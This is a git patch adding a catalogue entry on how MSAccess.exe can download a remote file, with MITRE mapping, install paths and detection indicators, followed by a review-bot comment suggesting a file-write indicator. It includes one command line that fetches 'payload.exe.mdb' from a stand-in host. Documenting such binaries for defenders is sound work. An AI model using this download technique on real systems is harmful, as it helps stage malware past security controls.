From 3c826ab1caaf20b913f34f708ca5cee8530103cd Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sat, 6 Apr 2024 01:18:57 +0700 Subject: [PATCH] Add MSAccess as a new downloader (#288) Co-authored-by: Wietze --- yml/OtherMSBinaries/Msaccess.yml | 36 ++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 yml/OtherMSBinaries/Msaccess.yml diff --git a/yml/OtherMSBinaries/Msaccess.yml b/yml/OtherMSBinaries/Msaccess.yml new file mode 100644 index 0000000..618cbdb --- /dev/null +++ b/yml/OtherMSBinaries/Msaccess.yml 
@@ -0,0 +1,36 @@ +--- +Name: MSAccess.exe +Description: Microsoft Office component +Author: Nir Chako +Created: 2023-04-30 +Commands: + - Command: MSAccess.exe https://example.com/payload.exe.mdb + Description: Downloads payload from remote server + Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSAccess.exe + - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSAccess.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSAccess.exe + - Path: C:\Program Files\Microsoft Office\Office16\MSAccess.exe + - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSAccess.exe + - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSAccess.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSAccess.exe + - Path: C:\Program Files\Microsoft Office\Office15\MSAccess.exe + - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSAccess.exe + - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSAccess.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSAccess.exe + - Path: C:\Program Files\Microsoft Office\Office14\MSAccess.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSAccess.exe + - Path: C:\Program Files\Microsoft Office\Office12\MSAccess.exe +Detection: + - IOC: URL on a MSAccess command line + - IOC: MSAccess making unexpected network connections or DNS requests +Acknowledgement: + - Person: Nir Chako + Handle: '@C_h4ck_0'
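Review bot: The Detection block at the end of the new file covers only the command line and network side (`URL on a MSAccess command line`, unexpected network connections or DNS requests), while the Usecase and the `Download: INetCache` tag state that the downloaded file is written to INetCache, so a file-write indicator is missing. Consider adding something like `- IOC: MSAccess.exe creating files in INetCache`, so that defenders who only have file-creation telemetry still get a signal. Two smaller points on the same file: there is no Resources section pointing to where this behaviour was documented, and `Description: Microsoft Office component` does not say what the binary is, which makes the entry harder to validate. Also confirm that `Created: 2023-04-30` is intended, given the commit is dated 6 Apr 2024.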